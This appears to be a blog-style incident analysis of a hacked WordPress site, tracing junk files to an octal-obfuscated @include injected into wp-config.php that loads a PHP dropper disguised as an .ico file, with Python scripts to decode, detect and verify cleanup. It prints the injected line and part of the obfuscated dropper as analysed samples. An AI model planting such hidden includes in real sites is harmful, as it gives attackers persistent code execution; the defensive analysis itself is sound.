A pile of random files appearing in the WordPress directory

A pile of random files suddenly appeared in the WordPress directory. This post analyses the cause and gives a fix.

1. Problem description

The site was slow. After logging into the server and listing the WordPress directory, I found a pile of random files:

$ ls
0gikql  5wrCju  b8O49g        f4GMY8        HYA9ej              kDQYM5       mo0VOK  P4GJE9  readme.html           sztmJh  vmopCD                WYurax
0Nt3ai  6IxnR2  BJPmv3        F9UewA        i05cZx              KoILCl       Mpo23r  P9urRg  RikuDf                tcuEoM  vPpxGQ                WzHlSy
1btGns  6LadTs  BKTtO2        fdHpcg        I1wgPc              KQtFeJ       Mq8IBJ  PAZGYC  rIsH3J                temYKM  vsb4Pa                x7i9ld
1dE7nq  6S1sTI  bol1RB        fkl3vnao.php  i92lAK              kRp2BJ       mQX5AB  PBI0H7  rkidLe                tFfDvU  VWC2OG                x9KLuU
1lYQmO  7CGOfH  bovO9e        fLW0V2        Ice8jb              kVxA8c       myGZLc  pfo3wA  RM1pJ3                thNrdu  w3l6sr                Xbzx3V
1o6NA5  7DsKmG  c2upDS        Fp9PAK        index.html          KzvHpw       n637Vl  pfVNuU  robots.txt            TJQlg5  wGOCyd                xMf81k
1RbKYZ  7s2zmJ  cedra.php     fqVnxP        index.html.bak.bak  LekHB4       n71YEF  PgpmxL  rOUjBZ                TOhfr2  WlK7pq                xmlrpc.php
1RTS9x  7viuOQ  cikb8t        fxtNke        index.php           LfDQmz       nbBshv  pilVOc  rPCUvy                TtL1gs  wMKj5p                xOiWZE
2gBwbA  831znT  cLmoYR        GgCu5t        irXhoV              lgmwGp       NCbOUT  pj0giP  rpjRAe                u2UeTr  wp-activate.php       XwyvgQ
2JQwrP  87cOJQ  CpfrIM        gj6Y2P        j0gAap              license.txt  Ncv5CP  pJX83r  rPpaVJ                U40FXW  wp-admin              xXN8ny
2TNcjr  8oNr4B  cSUoat        GJcs1r        J3Tg74              LoB1pc       nGzcbR  PrjoZC  rUzovE                u5HGLo  wp-blog-header.php    Y9RnEg
2VjbU9  8yXQxL  CWc5UF        gtnieC        J5iIA2              LoGUbi       nid7Of  prOhvm  RwybzA                UByF42  wp-comments-post.php  Y9Sv5z
2Zetzc  93ixUw  DERPhl        guYNnG        J8S07q              lTICBw       nu4owe  Q1f4J5  s5Xi9Z                UDTvts  wp-config.php         yFtdpO
32WwMV  9aXSWv  dHno50        gXKyPw        j9nTPV              Luf5yF       NXWPV4  Q1htMb  S6igQl                uH6lRc  wp-config-sample.php  ynj40s
34VGiD  9G8pOx  dNh1bf        H1xCT5        jaXDYE              LvbXlZ       NYB68x  Q4Nh0a  SCLITK                UHmBrM  wp-content            yNTaIU
3f2Alk  9mXrR6  dpyxvjlx.php  h5U1Vs        JcIQDC              lVXA0Q       o0XVOT  q6juvQ  seMD69                UIcjXf  wp-cron.php           YXi09N
3oekQf  9NpvET  dSTKfF        HayrqI        jekDzO              M0kpNZ       ofFm8D  Q6x8Ab  SEN0qz                uo7rDZ  wp-includes           ZEUtmG
3rbpsF  9y3CVk  DXA8UM        HG0sOY        jeYQtA              m8Kdby       OfZcMq  q81zai  sevlus.php.suspected  UP1cQ0  wp-links-opml.php     zFAIkD
41vkNm  A5sVBR  dxeZmC        Hg8ACz        jk21ZV              MAb9hy       OG6uXT  qDWb6h  SLtXnQ                uPfexj  wp-load.php           zKLEo3
4AmdTM  ahGxsc  E7uxVT        hJMlmE        JLDRWq              maYAl4       OgBnkt  qmXdeo  snovles.php           USGOT1  wp-login.php          zlF8uX
4I6JXi  AIE3Wo  EBO3e2        hlfswt        JLRyEh              mgu6d9       Oi41fV  QS8KZU  SOqTKe                uTKvih  wp-mail.php           zxnRpT
4rC8LJ  ALaTRs  EuMRBw        hsbs77vi.php  jMH6xL              mh           OUnI81  Qv7shy  SQI7l1                uVyeT8  wp-settings.php       zY9e4v
4SksdN  alPMQo  eyT6lI        HSDk1W        jSiwtr              MHrDRe       oUP46c  qwPcQ2  sSIGJF                uwvBLD  wp-signup.php
52CR7s  aSkqyG  ezhpqZ        HWdv3f        K6qTfs              mic.php      OVLIzC  R5DteT  stbpT0                V6BnP8  wp-trackback.php
5Reia7  aT0thJ  F1kgtx        hX7Ciq        K907cV              MjIm2e       ozgDkq  r91iOl  Sw61PJ                VJ6X2U  WxJtdi

Some of the files are 0 bytes in size, others are 2.3M.

$ ls -lsh
total 283M
   0 -rwxr-xr-x  1 www-data www-data    0 Mar  9 14:22 0gikql
2.3M -rwxr-xr-x  1 www-data www-data 2.3M Mar  8 20:49 0Nt3ai
   0 -rwxr-xr-x  1 www-data www-data    0 Mar 11 10:41 1btGns
2.3M -rwxr-xr-x  1 www-data www-data 2.3M Mar 10 20:05 1dE7nq
2.3M -rwxr-xr-x  1 www-data www-data 2.3M Mar 10 23:42 1lYQmO
   0 -rwxr-xr-x  1 www-data www-data    0 Mar  9 20:52 1o6NA5
   0 -rwxr-xr-x  1 www-data www-data    0 Mar 11 20:04 1RbKYZ

2. Analysis

By chance, I noticed that wp-config.php had gained the following extra lines:

$ cat zhilitea.com/wp-config.php | more
<?php
/*dbfd6*/

@include "\057var\057www\057zhi\154ite\141.co\155/wp\055inc\154ude\163/js\057tin\171mce\057.45\0704c2\1425.i\143o";

/*dbfd6*/

\057 is octal, i.e. the slash /. Decoding "\057var\057www\057zhi\154ite\141.co\155/wp\055inc\154ude\163/js\057tin\171mce\057.45\0704c2\1425.i\143o" (Python source below) gives /var/www/zhilitea.com/wp-includes/js/tinymce/.4584c2b5.ico

#!/usr/bin/env python3
import re

# The literal exactly as it appears in wp-config.php. A raw string is used so
# that Python does not silently resolve the octal escapes itself (in a normal
# string literal "\057var" would already be "/var" before the loop ran).
s = r"\057var\057www\057zhi\154ite\141.co\155/wp\055inc\154ude\163/js\057tin\171mce\057.45\0704c2\1425.i\143o"

# PHP double-quoted strings accept \NNN with one to three octal digits;
# replace each escape with the character it stands for (\057 -> '/').
path = re.sub(r'\\([0-7]{1,3})', lambda m: chr(int(m.group(1), 8)), s)

print(path)
# /var/www/zhilitea.com/wp-includes/js/tinymce/.4584c2b5.ico

And the file really does exist:

/var/www/zhilitea.com/wp-includes/js/tinymce$ ls -la .4584c2b5.ico 
-rw-r--r-- 1 www-data www-data 9404 Apr  9  2019 .4584c2b5.ico

Viewing it as hex in Vim (in command mode type :%!xxd and press Enter), the file contents are:

00000000: 3c3f 7068 700a 245f 6532 7861 3720 3d20  <?php.$_e2xa7 = 
00000010: 6261 7365 6e61 6d65 2f2a 7438 7737 2a2f  basename/*t8w7*/
00000020: 282f 2a39 2a2f 7472 696d 2f2a 3165 7576  (/*9*/trim/*1euv
00000030: 2a2f 282f 2a68 3477 3639 2a2f 7072 6567  */(/*h4w69*/preg
00000040: 5f72 6570 6c61 6365 2f2a 7670 616d 2a2f  _replace/*vpam*/
00000050: 282f 2a35 386c 792a 2f72 6177 7572 6c64  (/*58ly*/rawurld
00000060: 6563 6f64 652f 2a77 7434 6f36 2a2f 282f  ecode/*wt4o6*/(/
00000070: 2a7a 2a2f 2225 3246 2535 4325 3238 2e25  *z*/"%2F%5C%28.%
00000080: 3241 2532 3425 3246 222f 2a6d 702a 2f29  2A%24%2F"/*mp*/)
00000090: 2f2a 3176 712a 2f2c 2027 272c 205f 5f46  /*1vq*/, '', __F
000000a0: 494c 455f 5f2f 2a69 2a2f 292f 2a32 2a2f  ILE__/*i*/)/*2*/
000000b0: 2f2a 356d 327a 302a 2f29 2f2a 6a6c 682a  /*5m2z0*/)/*jlh*
000000c0: 2f2f 2a33 3630 2a2f 292f 2a66 7a35 2a2f  //*360*/)/*fz5*/
000000d0: 3b24 5f73 3666 3064 3537 203d 2022 4752  ;$_s6f0d57 = "GR
000000e0: 2531 3525 3130 2531 3525 3037 5725 3034  %15%10%15%07W%04
000000f0: 2535 4325 3430 2530 4325 3037 4725 3039  %5C%40%0C%07G%09
00000100: 4741 4a51 2530 325f 2533 4456 4125 3037  GAJQ%02_%3DVA%07
00000110: 2531 3725 3041 5625 3430 6a25 3542 4625  %17%0AV%40j%5BF%
00000120: 3036 5325 3136 5025 3045 4e4a 4625 3234  06S%16P%0ENJF%24
00000130: 4f25 3346 2535 4351 2530 3525 3542 2530  O%3F%5CQ%05%5B%0
00000140: 4350 2530 364e 2531 3025 3142 2535 4351  CP%06N%10%1B%5CQ
00000150: 5455 6b25 3030 2535 4425 3043 414b 2531  TUk%00%5D%0CAK%1
00000160: 3125 3137 304d 4650 5925 3430 2530 3625  1%170MFPY%40%06%
00000170: 3132 4525 3139 2530 4558 4a54 2532 3474  12E%19%0EXJT%24t
00000180: 2535 4356 2535 4425 3343 4125 3037 4125  %5CV%5D%3CA%07A%
00000190: 3036 4e25 3036 2531 4425 3543 2535 4247  06N%06%1D%5C%5BG
000001a0: 6758 2530 4355 4525 3139 2530 4525 3237  gX%0CUE%19%0E%27
000001b0: 3625 3233 6225 3144 2530 4578 2535 4425  6%23b%1D%0Ex%5D%
000001c0: 3044 2535 4225 3344 464b 2531 444b 4842  0D%5B%3DFK%1DKHB
000001d0: 2535 4252 6751 2531 3125 3430 2530 4447  %5BRgQ%11%40%0DG
000001e0: 2535 444e 4f4f 2531 4525 3144 2530 4578  %5DNOO%1E%1D%0Ex
000001f0: 2535 4425 3044 2535 4225 3344 464b 2531  %5D%0D%5B%3DFK%1

Now the problem is clear: whenever wp-config.php runs, it loads the PHP file above (@include .4584c2b5.ico) and executes it, and that code produces the pile of random files.
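The two things found by hand above (an include of an octal-escaped path in a .php file, and PHP code stored under a non-PHP extension) can be checked across a whole webroot. The scanner below is an added example, not code from the original post: it decodes PHP double-quoted escapes, strips the /*...*/ comment padding seen in the hex dump, and reports both artefact types. The function names are mine, and the sample tree it scans is constructed inside the block so it runs offline.

```python
#!/usr/bin/env python3
"""Added example, not from the original post: scan a WordPress webroot for the
two artefacts found above: an include of an octal-escaped path in a .php file,
and PHP code stored under a non-PHP extension (the .ico dropper).
The sample tree built at the bottom is constructed for the demo."""
import os
import re
import tempfile

# include/require of a double-quoted string literal, optionally @-silenced
INCLUDE_RE = re.compile(
    r'@?\s*(?:include_once|include|require_once|require)\s*\(?\s*"((?:[^"\\]|\\.)*)"')
# PHP double-quoted escapes: \NNN octal, \xHH hex, or a backslash-escaped char
ESCAPE_RE = re.compile(r'\\(?:([0-7]{1,3})|x([0-9A-Fa-f]{1,2})|(.))', re.S)
# block comments the obfuscator sprinkles between tokens, e.g. /*t8w7*/
COMMENT_RE = re.compile(r'/\*.*?\*/', re.S)
PHP_EXTENSIONS = {'.php', '.phtml', '.inc'}


def decode_php_string(literal: str) -> str:
    """Resolve the escapes PHP applies inside a double-quoted string."""
    def unescape(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 8))
        if m.group(2) is not None:
            return chr(int(m.group(2), 16))
        ch = m.group(3)
        # \\ \" \$ lose the backslash; other sequences (\n etc.) are not needed
        # for a path and are kept verbatim
        return ch if ch in '\\"$' else m.group(0)
    return ESCAPE_RE.sub(unescape, literal)


def suspicious_includes(php_source: str):
    """(raw literal, decoded path) for each include whose path uses escapes."""
    src = COMMENT_RE.sub('', php_source)
    return [(m.group(1), decode_php_string(m.group(1)))
            for m in INCLUDE_RE.finditer(src) if '\\' in m.group(1)]


def is_php_payload(data: bytes) -> bool:
    """True when the body opens with a PHP tag, whatever the extension says."""
    head = data.lstrip()
    return head.startswith(b'<?php') or head.startswith(b'<?=')


def scan_tree(root: str):
    """Walk the webroot and return sorted (finding, relative path, detail) tuples."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            ext = os.path.splitext(name)[1].lower()
            with open(path, 'rb') as fh:
                data = fh.read(1 << 20)          # the first MiB is enough for both checks
            if ext in PHP_EXTENSIONS:
                for _literal, decoded in suspicious_includes(data.decode('latin-1')):
                    findings.append(('obfuscated-include', rel, decoded))
            elif is_php_payload(data):
                findings.append(('php-in-non-php-file', rel, ext or '(no extension)'))
    return sorted(findings)


def build_sample_tree() -> str:
    """Constructed fixture mirroring the shapes seen in the post."""
    root = tempfile.mkdtemp(prefix='wp-scan-')

    def put(rel, data):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, 'wb') as fh:
            fh.write(data)

    # wp-config.php carrying the injected include (the literal from the post)
    put('wp-config.php', (
        '<?php\n/*dbfd6*/\n'
        '@include "\\057var\\057www\\057zhi\\154ite\\141.co\\155/wp\\055inc'
        '\\154ude\\163/js\\057tin\\171mce\\057.45\\0704c2\\1425.i\\143o";\n'
        '/*dbfd6*/\nrequire_once "wp-settings.php";\n').encode())
    # the dropper: PHP hiding behind an .ico name (body is a constructed stand-in)
    put('wp-includes/js/tinymce/.4584c2b5.ico',
        b'<?php /*t8w7*/ $_e2xa7 = basename(__FILE__);\n')
    # a genuine icon starts with the ICO header, not a PHP tag
    put('favicon.ico', b'\x00\x00\x01\x00' + b'\x00' * 16)
    # one of the empty junk files from the listing
    put('0gikql', b'')
    return root


if __name__ == '__main__':
    for finding in scan_tree(build_sample_tree()):
        print(*finding, sep='\t')
```

Run against a real webroot by calling scan_tree('/var/www/<site>') instead of the sample tree. An include whose path literal needs escapes to be readable has no legitimate reason to exist in wp-config.php, and a file named .ico whose body starts with <?php is a dropper regardless of what else it contains, so both findings are worth acting on directly.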

3. Fix

Fix: delete the file .4584c2b5.ico, delete the extra code from wp-config.php, and remove the group write permission from wp-config.php.

/var/www/zhilitea.com$ sudo chmod 640 wp-config.php 
/var/www/zhilitea.com$ ls -l wp-config.php 
-rw-r----- 1 www-data www-data 2937 Aug 28 21:03 wp-config.php

Also, append the following to the end of .htaccess:

<files wp-config.php>
order allow,deny
deny from all
</files>
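After applying the steps above, it is worth confirming that each one actually took effect. The check below is an added example, not code from the original post: it verifies that the dropper is gone, that wp-config.php no longer carries an @include of an escaped path, that its mode is 0640 or tighter, and that .htaccess denies access to it. The function names and the before/after sample webroots are mine and are constructed inside the block; the path of the dropper is the one found in the post.

```python
#!/usr/bin/env python3
"""Added example, not from the original post: verify that the remediation
steps above have been applied to a webroot. The webroot layout is assumed to
match the post; the sample trees are constructed for the demo."""
import os
import re
import stat
import tempfile

# <Files wp-config.php> block carrying either the Apache 2.2 directives from
# the post or the Apache 2.4 equivalent (Require all denied)
DENY_RE = re.compile(
    r'<files\s+"?wp-config\.php"?\s*>.*?(?:deny\s+from\s+all|require\s+all\s+denied).*?</files>',
    re.I | re.S)
# the injected line: @include of a double-quoted literal containing an octal escape
INJECT_RE = re.compile(r'@include\s+"[^"\n]*\\[0-7]')

DROPPER_REL = os.path.join('wp-includes', 'js', 'tinymce', '.4584c2b5.ico')


def wp_config_mode_ok(path: str) -> bool:
    """0640 or tighter: no group write bit and no permissions at all for 'other'."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    return not (mode & (stat.S_IWGRP | stat.S_IRWXO))


def htaccess_blocks_wp_config(text: str) -> bool:
    return DENY_RE.search(text) is not None


def wp_config_clean(text: str) -> bool:
    return INJECT_RE.search(text) is None


def check_webroot(root: str) -> dict:
    """One boolean per remediation step; True means the step is in place."""
    cfg = os.path.join(root, 'wp-config.php')
    ht = os.path.join(root, '.htaccess')
    with open(cfg, encoding='latin-1') as fh:
        cfg_text = fh.read()
    ht_text = ''
    if os.path.exists(ht):
        with open(ht, encoding='latin-1') as fh:
            ht_text = fh.read()
    return {
        'dropper_removed': not os.path.exists(os.path.join(root, DROPPER_REL)),
        'wp_config_clean': wp_config_clean(cfg_text),
        'wp_config_mode_ok': wp_config_mode_ok(cfg),
        'htaccess_blocks_wp_config': htaccess_blocks_wp_config(ht_text),
    }


# constructed file contents; the include literal is the one from the post
INJECTED = ('<?php\n/*dbfd6*/\n'
            '@include "\\057var\\057www\\057zhi\\154ite\\141.co\\155/wp\\055inc'
            '\\154ude\\163/js\\057tin\\171mce\\057.45\\0704c2\\1425.i\\143o";\n'
            '/*dbfd6*/\n')
CLEAN = "<?php\ndefine('DB_NAME', 'wordpress');\nrequire_once 'wp-settings.php';\n"
HTACCESS = '<files wp-config.php>\norder allow,deny\ndeny from all\n</files>\n'


def build_sample(remediated: bool) -> str:
    """Constructed webroot before (False) or after (True) the fix."""
    root = tempfile.mkdtemp(prefix='wp-fix-')
    cfg = os.path.join(root, 'wp-config.php')
    with open(cfg, 'w') as fh:
        fh.write(CLEAN if remediated else INJECTED)
    # 664 leaves the file group-writable, which is the bit the fix removes
    os.chmod(cfg, 0o640 if remediated else 0o664)
    if remediated:
        with open(os.path.join(root, '.htaccess'), 'w') as fh:
            fh.write(HTACCESS)
    else:
        dropper = os.path.join(root, DROPPER_REL)
        os.makedirs(os.path.dirname(dropper))
        with open(dropper, 'wb') as fh:
            fh.write(b'<?php /* constructed stand-in for the dropper */\n')
    return root


if __name__ == '__main__':
    for label, state in (('before', False), ('after', True)):
        print(label, check_webroot(build_sample(state)))
```

Point check_webroot at the real webroot once the steps are done; every value should be True. The .htaccess check accepts both spellings because on Apache 2.4 the order/deny directives shown above only work when mod_access_compat is loaded, and Require all denied is the native form there.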
